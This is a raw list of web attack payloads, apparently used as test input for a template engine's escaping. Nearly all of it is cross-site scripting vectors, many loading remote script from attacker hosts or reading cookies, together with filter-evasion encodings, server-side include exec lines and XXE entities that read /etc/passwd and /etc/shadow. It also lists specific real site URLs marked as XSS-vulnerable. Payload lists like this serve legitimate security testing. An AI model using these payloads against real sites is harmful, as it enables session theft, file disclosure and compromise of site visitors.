SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\n<;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\";XSS\\\";)>;\\r\\nSRC=http://ha.ckers.org/xss.js\\r\\nSRC=//ha.ckers.org/.j>;\\r\\n<;IMG SRC=\\\";(\\\';XSS\\\';)\\\";\\r\\n<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;\\r\\n;alert(\\\";XSS\\\";);//;\\r\\n<;IMG \\\";\\\";\\\";>;;alert(\\\";XSS\\\";);\\\";>;\\r\\n;a=/XSS/\\r\\na=\\\";>;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\n=\\\";blah\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\na=\\\";blah\\\"; \\\';\\\'; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\n\\\";a=\\\';>;\\\';\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\na=`>;` SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\n;(\\\";<;SCRI\\\";);;PT SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\na=\\\";>\\\';>\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;;\\r\\n<;A HREF=\\\";http://66.102.7.147/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.google.com\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://1113982867/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://0x42.0x0000066.0x7.0x93/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://0102.0146.0007.00000223/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";h tt p://6&;#09;6.000146.0x7.147/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";//www.google.com/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";//google\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://ha.ckers.org@google\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://google:ha.ckers.org\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://google.com/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.google.com./\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";\\\';http://www.google.com/\\\';\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.gohttp://www.google.com/ogle.com/\\\";>;XSS<;/A>;\\r\\n\\r\\n<img >\\r\\n<img >\\r\\n<img >\\>\\ >>\\>\\>\\>\\r\\n<img >\\r\\n<img >\\>\\>\\></LAYER>\\r\\n<link REL=\\\"stylesheet\\\" HREF=\\\";\\\">\\r\\n<style>li {list-style-image: url(\\\";\\\");</STYLE><UL><LI>XSS\\r\\n<img >\\>\\>\\></iframe>\\r\\n<FRAMESET><FRAME SRC=\\\";\\\"></frameset>\\r\\n<table BACKGROUND=\\\";\\\">\\r\\n<table><TD BACKGROUND=\\\";\\\">\\r\\n<div url(;)\\\">\\r\\n<div url(;)\\\">\\r\\n<div document.vulnerable=true);\\\">\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';</style>\\r\\n<img >\\>\\r\\nexp/*<A >\\r\\n<style TYPE=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<style>.XSS{background-image:url(\\\"\\\");}</STYLE><A ></a>\\r\\n<style type=\\\"text/css\\\">BODY{background:url(\\\"\\\")}</style>\\r\\n<!--[if gte IE 4]><![endif]-->\\r\\n<base HREF=\\\";//\\\">\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=></object>\\r\\n<XML ID=I><X><C><![<IMG >]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\\r\\n<XML ID=\\\"xss\\\"><I><B><IMG >></B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></span>\\r\\n<html><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSSdocument.vulnerable=true\\\"></BODY></html>\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>document.vulnerable=true\\\'); ?>\\r\\n<meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\\\">\\r\\n<head><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>\\r\\n<a >\\r\\n<div >\\r\\n<img >\\r\\n<img >\\r\\n<input type=\\\"image\\\" dynsrc=\\\";\\\">\\r\\n<bgsound src=\\\";\\\">\\r\\n&\\r\\n&{document.vulnerable=true;};\\r\\n<img >\\>\\>\\r\\n<img >\\r\\n<img >\\r\\n<a >document.vulnerable=true;\\\">\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\">\\r\\n<body >\\r\\n<div url(;);\\\">\\r\\n<div url([link to code]);\\\">\\r\\n<div url([link to code]);\\\">\\r\\n<div document.vulnerable=true;);\\\">\\r\\n<style type=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<object classid=\\\"clsid:...\\\" codebase=\\\";\\\">\\r\\n<style><!--</style>\\r\\n<\\r\\n\\r\\n<!-- -- --><!-- -- -->\\r\\n<img >\\r\\n<img >\\\" =\\\"document.vulnerable=true;\\\">\\r\\n<xml src=\\\";\\\">\\r\\n<xml id=\\\"X\\\"><a><b>;</b></a></xml>\\r\\n<div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"></div>\\r\\n[\\\\xC0][\\\\xBC]script>document.vulnerable=true;[\\\\xC0][\\\\xBC]/script>\\r\\n<style>@import\\\'http://www.securitycompass.com/xss.css\\\';</style>\\r\\n<meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\\\">\\r\\n<style>BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}</style>\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"></object>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"><xss:xss>XSS</xss:xss></html>\\r\\n\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js>\\\'\\\"-->\\r\\n\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n` SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n\\\'>\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\nPT SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<div url(http://www.securitycompass.com/xss.js);\\\"> [Mozilla]\\r\\n\\\";>;<;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\";XSS\\\";)>;\\r\\n;;alert(1);\\r\\n<;/br >;\\r\\n<;scrscriptipt>;alert(1)<;/scrscriptipt>;\\r\\n<;br size=\\\\\\\";&;{alert('XSS')}\\\\\\\";>;\\r\\nperl -e 'print \\\\\\\";<;IMG SRC=java\\\\0script:alert(\\\\\\\";XSS\\\\\\\";)>;\\\\\\\";;' >; out\\r\\nperl -e 'print \\\\\\\";<;SCR\\\\0IPT>;alert(\\\\\\\";XSS\\\\\\\";)<;/SCR\\\\0IPT>;\\\\\\\";;' >; out\\r\\n<~/XSS/*-*/>\\r\\n<~/XSS/*-*/>\\r\\n<~/XSS/*-*/>\\r\\n<~/XSS >\\r\\n\\\">\\r\\n</XSS/*-*/>\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n</XSS >\\r\\n>\\\">&\\r\\n\\\"><STYLE>@import\\\"(\\\'XSS\\\')\\\";</STYLE>\\r\\n>\\\"\\\'><img >\\r\\n>"'><img src="">\\r\\n\\\'<script>alert(\\\'XSS\\\')</script>\\\'\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >")>\\r\\n<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>\\r\\n<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> \\r\\n<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>\\r\\n<IMG >\\\'XSS\\\');\\\">\\r\\n<IMG >\\\'XSS\\\');\\\">\\r\\n<![CDATA[]]>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><foo><![CDATA[![CDATA[>]]>alert(\\\'gotcha\\\');<![CDATA[![CDATA[>]]></foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><foo><![CDATA[\\\' or 1=1 or \\\'\\\'=\\\']]></foof>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file://c:/boot.ini\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///etc/passwd\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///etc/shadow\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///dev/random\\\">]><foo>&xee;</foo>\\r\\n\\r\\n\\r\\n">\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG > \\r\\n<img >\\r\\n<IMG \\\"\\\"\\\">\\\">\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\>\\>\\>\\r\\n<IMG >alert(\\\"XSS\\\");//\\r\\n\\r\\n\\\"><s\\\"+\\\"cript>alert()\\r\\nfoo\\r\\n<scralert(1)\\r\\n\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>\\r\\n<marquee >=(◕_◕)=

result with twig: {{ xss.xss | escape }}:

<body onLoad=\\\"while(true) alert(\\\'XSS\\\');\\\">\\r\\n\\\'\\\"></title><script>alert(1111)</script>\\r\\n</textarea>\\\'\\\"><script>alert(document.cookie)</script>\\r\\n\\\'\\\"\\\"><script language=\\\"JavaScript\\\"> alert(\\\'X \\\\nS \\\\nS\\\');</script>\\r\\n</script></script><<<<script><>>>><<<script>alert(123)</script>\\r\\n<html><noalert><noscript>(123)</noscript><script>(123)</script>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n\\\'></select><script>alert(123)</script>\\r\\n\\\'>\\\"><script src = \\\'http://www.site.com/XSS.js\\\'></script>\\r\\n}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>\\r\\n<SCRIPT>document.write(\\\"XSS\\\");</SCRIPT>\\r\\na=\\\"get\\\";b=\\\"URL\\\";c=\\\"javascript:\\\";d=\\\"alert(\\\'xss\\\');\\\";eval(a+b+c+d);\\r\\n=\\\'><script>alert(\\\"xss\\\")</script>\\r\\n<script+src=\\\">\\\"+src=\\\"http://yoursite.com/xss.js?69,69\\\"></script>\\r\\n<body background=javascript:\\\'\\\"><script>alert(navigator.userAgent)</script>></body>\\r\\n\\\">/XaDoS/><script>alert(document.cookie)</script><script src=\\\"http://www.site.com/XSS.js\\\"></script>\\r\\n\\\">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>\\r\\nsrc=\\\"http://www.site.com/XSS.js\\\"></script>\\r\\ndata:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\\r\\n!--\\\" /><script>alert(\\\'xss\\\');</script>\\r\\n<script>alert(\\\"XSS by \\\\nxss\\\")</script><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\"><script>alert(\\\"XSS by \\\\nxss\\\")</script>><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\'\\\"></title><script>alert(\\\"XSS by \\\\nxss\\\")</script>><marquee><h1>XSS by xss</h1></marquee>\\r\\n<img \\\"\\\"\\\"><script>alert(\\\"XSS by \\\\nxss\\\")</script><marquee><h1>XSS by xss</h1></marquee>\\r\\n<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\"><script>alert(1337)</script>\\\"><script>alert(\\\"XSS by \\\\nxss</h1></marquee>\\r\\n\\\'\\\"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>\\r\\n<iframe src=\\\"javascript:alert(\\\'XSS by \\\\nxss\\\');\\\"></iframe><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\\\"\\\" alt=\\\'\\r\\n\\\"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\\\"\\\" alt=\\\"\\r\\n\\\\\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\\\"\\\" alt=\\\\\\\'\\r\\nhttp://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??\\r\\nhttp://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??\\r\\n\\\'); alert(\\\'xss\\\'); var x=\\\'\\r\\n\\\\\\\\\\\'); alert(\\\\\\\'xss\\\\\\\');var x=\\\\\\\'\\r\\n//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));\\r\\n>\\\"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>\\r\\n<img src=\\\"Mario Heiderich says that svg SHOULD not be executed trough image tags\\\" onerror=\\\"javascript:document.write(\\\'\\\\u003c\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u0020\\\\u0073\\\\u0072\\\\u0063\\\\u003d\\\\u0022\\\\u0064\\\\u0061\\\\u0074\\\\u0061\\\\u003a\\\\u0069\\\\u006d\\\\u0061\\\\u0067\\\\u0065\\\\u002f\\\\u0073\\\\u0076\\\\u0067\\\\u002b\\\\u0078\\\\u006d\\\\u006c\\\\u003b\\\\u0062\\\\u0061\\\\u0073\\\\u0065\\\\u0036\\\\u0034\\\\u002c\\\\u0050\\\\u0048\\\\u004e\\\\u0032\\\\u005a\\\\u0079\\\\u0042\\\\u0034\\\\u0062\\\\u0057\\\\u0078\\\\u0075\\\\u0063\\\\u007a\\\\u0030\\\\u0069\\\\u0061\\\\u0048\\\\u0052\\\\u0030\\\\u0063\\\\u0044\\\\u006f\\\\u0076\\\\u004c\\\\u0033\\\\u0064\\\\u0033\\\\u0064\\\\u0079\\\\u0035\\\\u0033\\\\u004d\\\\u0079\\\\u0035\\\\u0076\\\\u0063\\\\u006d\\\\u0063\\\\u0076\\\\u004d\\\\u006a\\\\u0041\\\\u0077\\\\u004d\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0069\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u0070\\\\u0062\\\\u0057\\\\u0046\\\\u006e\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0045\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0032\\\\u006c\\\\u0074\\\\u0059\\\\u0057\\\\u0064\\\\u006c\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0067\\\\u0062\\\\u0032\\\\u0035\\\\u0073\\\\u0062\\\\u0032\\\\u0046\\\\u006b\\\\u0050\\\\u0053\\\\u004a\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u0079\\\\u004b\\\\u0053\\\\u0049\\\\u002b\\\\u0050\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0048\\\\u004e\\\\u006a\\\\u0063\\\\u006d\\\\u006c\\\\u0077\\\\u0064\\\\u0044\\\\u0035\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u007a\\\\u004b\\\\u0054\\\\u0077\\\\u0076\\\\u0063\\\\u0032\\\\u004e\\\\u0079\\\\u0061\\\\u0058\\\\u0042\\\\u0030\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u006b\\\\u005a\\\\u0057\\\\u005a\\\\u007a\\\\u0049\\\\u0047\\\\u0039\\\\u0075\\\\u0062\\\\u0047\\\\u0039\\\\u0068\\\\u005a\\\\u0044\\\\u0030\\\\u0069\\\\u0059\\\\u0057\\\\u0078\\\\u006c\\\\u0063\\\\u006e\\\\u0051\\\\u006f\\\\u004e\\\\u0043\\\\u006b\\\\u0069\\\\u0050\\\\u006a\\\\u0077\\\\u0076\\\\u005a\\\\u0047\\\\u0056\\\\u006d\\\\u0063\\\\u007a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u005a\\\\u0079\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0055\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0047\\\\u004e\\\\u0070\\\\u0063\\\\u006d\\\\u004e\\\\u0073\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0059\\\\u0070\\\\u0049\\\\u0069\\\\u0041\\\\u0076\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u0064\\\\u0047\\\\u0056\\\\u0034\\\\u0064\\\\u0043\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0063\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0033\\\\u0052\\\\u006c\\\\u0065\\\\u0048\\\\u0051\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0043\\\\u0039\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u006a\\\\u0077\\\\u0076\\\\u0063\\\\u0033\\\\u005a\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0022\\\\u003e\\\\u003c\\\\u002f\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u003e\\\');\\\"></img>\\r\\n</body>\\r\\n</html>\\r\\n<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>\\r\\n<SCRIPT> alert(“XSS”); </SCRIPT>\\r\\n<BODY ONLOAD=alert(\\\"XSS\\\")>\\r\\n<BODY BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG DYNSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG LOWSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IFRAME SRC=”http://hacker-site.com/xss.html”>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<TABLE BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<TD BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<DIV STYLE=\\\"background-image: url(javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"width: expression(alert(\\\'XSS\\\'));\\\">\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://hacker.com/xss.html\\\">\\r\\n<EMBED SRC=\\\"http://hacker.com/xss.swf\\\" AllowScriptAccess=\\\"always\\\">\\r\\n&apos;;alert(String.fromCharCode(88,83,83))//\\\\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;\\r\\n&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;\\r\\n&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;\\r\\n&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser\\r\\nexp/*&lt;XSS STYLE=&apos;no\\\\xss:noxss(&quot;*//*&quot;);\\r\\n&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;\\r\\n&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;\\r\\n&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;\\r\\n%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\\r\\n&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;\\r\\n&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;\\r\\na=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);\\r\\n&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;\\r\\n&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;\\r\\n&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;\\r\\n&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;\\r\\n&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;\\r\\n&lt;HTML xmlns:xss&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;\\r\\n&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\\r\\n&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; 